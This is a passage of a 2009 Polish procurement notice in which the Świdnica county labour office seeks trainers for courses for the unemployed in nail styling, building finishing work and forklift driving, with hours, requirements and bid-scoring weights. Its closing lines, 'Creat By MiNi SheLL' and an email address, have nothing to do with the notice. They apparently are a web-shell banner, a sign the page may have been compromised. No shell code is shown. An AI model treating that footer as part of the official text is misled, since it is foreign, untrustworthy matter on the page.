</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.praca.swidnica.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Powiatowy Urząd Pracy w Świdnicy ul. M.Skłodowskiej - Curie 5 58-100 Świdnica pokój nr 12.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.05.2009 godzina 08:30, miejsce: Powiatowy Urząd Pracy w Świdnicy ul. M.Skłodowskiej - Curie 5 58-100 Świdnica pokój nr 10.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Wizaż i stylizacja paznokci z podstawami prowadzenia działaności gospodarczej.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wizaż i stylizacja paznokci z podstawami prowadzenia działalności gospodarczej - 16 osób

Program szkolenia powinien zawierać m.in. następujące zagadnienia
1)Dermatologiczne schorzenia dłoni
2)Manicure tradycyjny i biologiczny
3)Metody przedłużania paznokci
4)Zdobnictwo paznokci
5)ABC działalności gospodarczej
6)Umiejętność poszukiwania i pozyskiwania zatrudnienia

Minimalna ilość godzin jednej grupy szkoleniowej przeznaczona na realizację powyższych zagadnień:
Łączna liczba godzin na jednego uczestnika szkolenia: 180 godzin zegarowych, w tym:
1.zajęć teoretycznych: 35 godz. zegarowych, z czego 5 godz. zegarowych przypada na zajęcia z umiejętności poszukiwania zatrudnienia,
2.zajęć praktycznych: 145 godz. zegarowych.

Wskazana przez Zamawiającego ilość godzin nie obejmuje czasu przeprowadzenia egzaminu końcowego.

Za godzinę zegarową kursu należy przyjąć 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny.

Szkolenie musi trwać przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu oraz nie mniej niż 6 godzin zegarowych i nie więcej niż 8 godzin zegarowych dziennie, przy czym liczba godzin szkolenia w miesiącu kalendarzowym przypadająca na jednego uczestnika szkolenia nie może wynosić mniej niż:
150 godzin zegarowych w pierwszym miesiącu szkolenia, 
30 godzin zegarowych w drugim miesiącu szkolenia.
Ponadto Wykonawca zobowiązany jest do podania Zamawiającemu ilości godzin lekcyjnych przypadających na jednego uczestnika szkolenia w rozbiciu na poszczególne zagadnienia tematyczne szkolenia znajdujące odzwierciedlenie w druku zaświadczenia o ukończeniu kursu.

Wymagania:
Kurs przeznaczony jest dla osób bezrobotnych z wykształceniem minimum podstawowym.

Po zakończeniu szkolenia uczestnik szkolenia otrzyma:
zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki.

Po zakończonym szkoleniu absolwent szkolenia powinien:
posiadać wiadomości z zakresu rozróżniania schorzeń dermatologicznych dłoni i paznokci,znać podstawowe metody przedłużania paznokci oraz techniki ich zdobnictwa,dobrać właściwą metodę przedłużania paznokci,wykonywać zabiegi pielęgnacyjne dłoni,udzielania porad z zakresu tematyki szkolenia.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
min. 8 stanowisk do samodzielnej nauki wizażu i stylizacji paznokci, tematyczne slajdy, filmy, tablice i plansze, atlasy dermatologiczne, foliogramy, aparatura i środki do sterylizacji i dezynfekcji, aparatura i narzędzia do manicure, preparaty i środki do manicure, min. 16 szt. pilników do paznokci, inne, w zależności od metod dobranych przez prowadzącego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. certyfikat jakości usług lub inny dokument - 15</li>
<li>3. kwalifikacje kadry dydatktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Technologie robót wykończeniowych w budownictwie (z docieplaniem budynków).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Technologie robót wykończeniowych w budownictwie (z docieplaniem budynków) - 10 osób

Program szkolenia powinien zawierać m.in. następujące zagadnienia:

Podstawowe zagadnienia BHP
Organizacja stanowiska roboczego
Murarz
Malarz
Tynkarz
Monter ścianek działowych i sufitów podwieszanych
Płytkarz - posadzkarz
Docieplanie budynków
Umiejętność poszukiwania i pozyskiwania zatrudnienia

Minimalna ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Łączna liczba godzin na jednego uczestnika szkolenia: 210 godzin zegarowych, w tym:
1.zajęć teoretycznych: 35 godz. zegarowych, z czego 5 godzin zegarowych przypada na zajęcia z umiejętności poszukiwania zatrudnienia,
2.zajęć praktycznych: 175 godz. zegarowych.

Wskazana przez Zamawiającego ilość godzin nie obejmuje czasu przeprowadzenia egzaminu końcowego.
Za godzinę zegarową kursu należy przyjąć 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny.

Szkolenie musi trwać przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu oraz nie mniej niż 6 godzin zegarowych i nie więcej niż 8 godzin zegarowych dziennie, przy czym liczba godzin szkolenia w miesiącu kalendarzowym przypadająca na jednego uczestnika szkolenia nie może wynosić mniej niż:
150 godzin zegarowych w pierwszym miesiącu szkolenia, 
60 godzin zegarowych w drugim miesiącu szkolenia.

Ponadto Wykonawca zobowiązany jest do podania Zamawiającemu ilości godzin lekcyjnych przypadających na jednego uczestnika szkolenia w rozbiciu na poszczególne zagadnienia tematyczne szkolenia znajdujące odzwierciedlenie w druku zaświadczenia o ukończeniu kursu.

Wymagania:
Kurs przeznaczony jest dla osób bezrobotnych z wykształceniem minimum podstawowym bez przeciwwskazań zdrowotnych do wykonywania danego zawodu (potwierdzonych stosownym zaświadczeniem i orzeczeniem lekarskim, w tym wysokościowym).

Po zakończeniu szkolenia uczestnik szkolenia otrzyma:
zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki.
 
Po zakończonym szkoleniu absolwent powinien m.in.:
wykonywać prace malarskie,kłaść tynki wewnętrzne, zewnętrzne, gładzie,
układać płytki ścienne i podłogowe,układać panele ścienne i podłogowe,
stawiać ścianki działowe i sufity podwieszane,docieplać budynki.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
narzędzia, materiały i urządzenia niezbędne do wykonywania prac budowlanych/wykończeniowych/ dociepleniowych, inne, w zależności od metod dobranych przez prowadzącego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.07.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. certyfikat jakości usług lub inny dokument - 15</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 25</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kierowca wózków jezdniowych z napędem silnikowym z mechanicznym napędem podnoszenia z wymianą butli gazowych przy wózkach.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kierowca wózków jezdniowych z napędem silnikowym z mechanicznym napędem podnoszenia z wymianą butli gazowych przy wózkach  - 30 osób w ramach 2 edycji piętnastoosobowych


Program szkolenia powinien zawierać m.in. następujące zagadnienia:

Przepisy bhp i ppoż.
Typy i budowa wózków
Czynności operatora przy obsłudze wózków przed rozpoczęciem pracy
Czynności operatora przy obsłudze wózków w trakcie pracy
Czynności operatora przy obsłudze wózków po zakończeniu pracy wózka
Zagadnienia z ładunkoznawstwa
Bezpieczna obsługa i wymiana butli gazowych
Praktyczna nauka jazdy
Umiejętność poszukiwania i pozyskiwania zatrudnienia
Zagadnienia teoretyczne dotyczące obsługi wózków jezdniowych oraz część praktyczna muszą być zgodne z programem Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach.

Minimalna ilość godzin szkolenia przeznaczona na realizację powyższych zagadnień:
Ogółem: 120 godzin zegarowych, w tym:
a)zajęć teoretycznych: 52 godz. zegarowe, z czego 5 godz. zegarowych przypada na zajęcia z zakresu umiejętności poszukiwania zatrudnienia,
b)zajęć praktycznych: 90 godz. lekcyjnych, czyli ok. 68 godz. zegarowych tj:
jazdy na wózkach - 75 godz. lekcyjnych, czyli ok. 56 godz. zegarowych i 30 minut (15 osób x 15 godz. = 225 / 3 osoby)
wymiana butli - 15 godz. lekcyjnych, czyli ok. 11 godz. zegarowych i 30 minut (3 grupy pięcioosobowe x 5 osób).
Na jednego uczestnika szkolenia przypada 67 godzin zegarowych, w tym:
a)zajęć teoretycznych: 52 godz. zegarowe, z czego 5 godz. zegarowych przypada na umiejętność poszukiwania zatrudnienia,
b)zajęć praktycznych: 20 godz. lekcyjnych, czyli ok. 15 godz. zegarowych 

Wskazana przez Zamawiającego ilość godzin nie obejmuje czasu przeprowadzenia egzaminu końcowego.

Za godzinę zegarową kursu należy przyjąć 60 minut, które obejmują zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana w sposób elastyczny.

Szkolenie z zakresu zajęć teoretycznych (każdej grupy szkoleniowej) musi trwać przeciętnie nie mniej niż 30 godzin zegarowych w tygodniu oraz nie mniej niż 6 godzin zegarowych i nie więcej niż 8 godzin zegarowych dziennie, natomiast z zakresu zajęć praktycznych - zgodnie z programem Ośrodka Doskonalenia Kadr Ministerstwa Gospodarki w Mysłowicach. 
Liczba godzin szkolenia (każdej grupy szkoleniowej) przypadająca na jednego uczestnika szkolenia nie może wynosić mniej niż 67 godzin zegarowych w miesiącu kalendarzowym.

Ponadto Wykonawca zobowiązany jest do podania Zamawiającemu ilości godzin lekcyjnych przypadających na jednego uczestnika szkolenia w rozbiciu na poszczególne zagadnienia tematyczne szkolenia znajdujące odzwierciedlenie w druku zaświadczenia o ukończeniu kursu.

Wymagania:
Kurs przeznaczony jest dla osób bezrobotnych z wykształceniem min. podstawowym bez przeciwwskazań zdrowotnych i psychologicznych do wykonywania danego zawodu (potwierdzonych stosownym zaświadczeniem i orzeczeniem lekarskim).

Po zakończeniu szkolenia uczestnik szkolenia otrzyma:
1.zaświadczenie o ukończonym szkoleniu wydane przez organizatora szkolenia zgodnie z Rozporządzeniem Ministra Edukacji i Nauki,
2.certyfikat wydany w języku angielskim,
3.zaświadczenie potwierdzające posiadanie kwalifikacji zawodowych (druk zgodny z załącznikiem Nr 2 do Rozporządzenia Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych Dz. U. Nr 31 poz. 216),
4.dodatkowy certyfikat potwierdzający jakość szkolenia wydany przez niezależną instytucję,
5.uprawnienia dla kierowcy wózka jezdniowego podnośnikowego z napędem silnikowym wydane przez Urząd Dozoru Technicznego.

Po zakończonym szkoleniu absolwent szkolenia powinien m.in.:
1)znać charakterystykę i podział wózków jezdniowych napędzanych,
2)posiadać wiadomości z zakresu przepisów bhp i ppoż. oraz Urzędu Dozoru Technicznego,
3)posiadać umiejętności niezbędne do samodzielnego prowadzenia wózków i wykonywania operacji manewrowych osprzętem wózka oraz jego obsługi i wymiany butli gazowych.

Wymagania dotyczące wyposażenia w sprzęt i materiały: 
min. 2 stanowiska do nauki jazdy i manewrowania wózkami jezdniowymi z napędem silnikowym: jeden wózek podnośnikowy (dopuszczony do jazdy przez Dozór Techniczny) i jeden wózek naładowny (wózki muszą być sprawne technicznie), plac manewrowy z halą do nauki jazdy na wózkach jezdniowych z napędem silnikowym, odtwarzacz DVD lub magnetowid, telewizor, projektor multimedialny, tematyczne filmy wideo lub płyty CD/DVD do zajęć, plansze tematyczne, przekrojowe modele, rzutniki do przeźroczy, inne, w zależności od metod dobranych przez prowadzącego..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.40.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.06.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. certyfikat jakości usług lub inny dokument - 15</li>
<li>3. kwalifikacje kadry dydaktycznej - 10</li>
<li>4. doświadczenie kadry dydaktycznej - 25</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com